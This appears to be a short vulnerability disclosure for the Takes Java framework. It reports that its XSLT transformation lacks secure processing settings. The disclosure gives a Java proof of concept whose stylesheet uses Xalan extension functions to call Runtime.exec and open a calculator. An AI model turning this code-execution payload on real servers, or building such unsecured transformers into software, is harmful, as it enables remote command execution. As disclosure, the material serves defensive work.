The Takes framework is vulnerable to XSLT injection due to the lack of secure parameters in XSLT transformation function that comes with the Takes framework.
Below is an example code snippet and its effect.
package org.example;
import org.apache.commons.io.IOUtils;
import org.cactoos.Text;
import org.cactoos.io.InputStreamOf;
import org.cactoos.text.Joined;
import org.takes.rs.RsText;
import org.takes.rs.RsXslt;
import javax.xml.transform.stream.StreamSource;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
public class SimpleTakesApp {
public static void main(String[] args) throws IOException {
final Text xml = new Joined(
" ",
"<?xml-stylesheet href='/a.xsl' type='text/xsl'?>",
"<page><data>ура</data></page>"
);
final Text xsl = new Joined(
" ",
"<xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\" xmlns:rt=\"http://xml.apache.org/xalan/java/java.lang.Runtime\" xmlns:ob=\"http://xml.apache.org/xalan/java/java.lang.Object\">\n" +
" <xsl:template match=\"/\">\n" +
" <xsl:variable name=\"rtobject\" select=\"rt:getRuntime()\"/>\n" +
" <xsl:variable name=\"process\" select=\"rt:exec($rtobject,'open -a Calculator')\"/>\n" +
" <xsl:variable name=\"processString\" select=\"ob:toString($process)\"/>\n" +
" <xsl:value-of select=\"$processString\"/>\n" +
" </xsl:template>\n" +
" </xsl:stylesheet>"
);
String transformedValue = IOUtils.toString(
new RsXslt(
new RsText(new InputStreamOf(xml)),
(href, base) -> new StreamSource(new InputStreamOf(xsl))
).body(),
StandardCharsets.UTF_8
);
System.out.println(transformedValue);
}
}
The Takes framework is vulnerable to XSLT injection due to the lack of secure parameters in XSLT transformation function that comes with the Takes framework. Below is an example code snippet and its effect.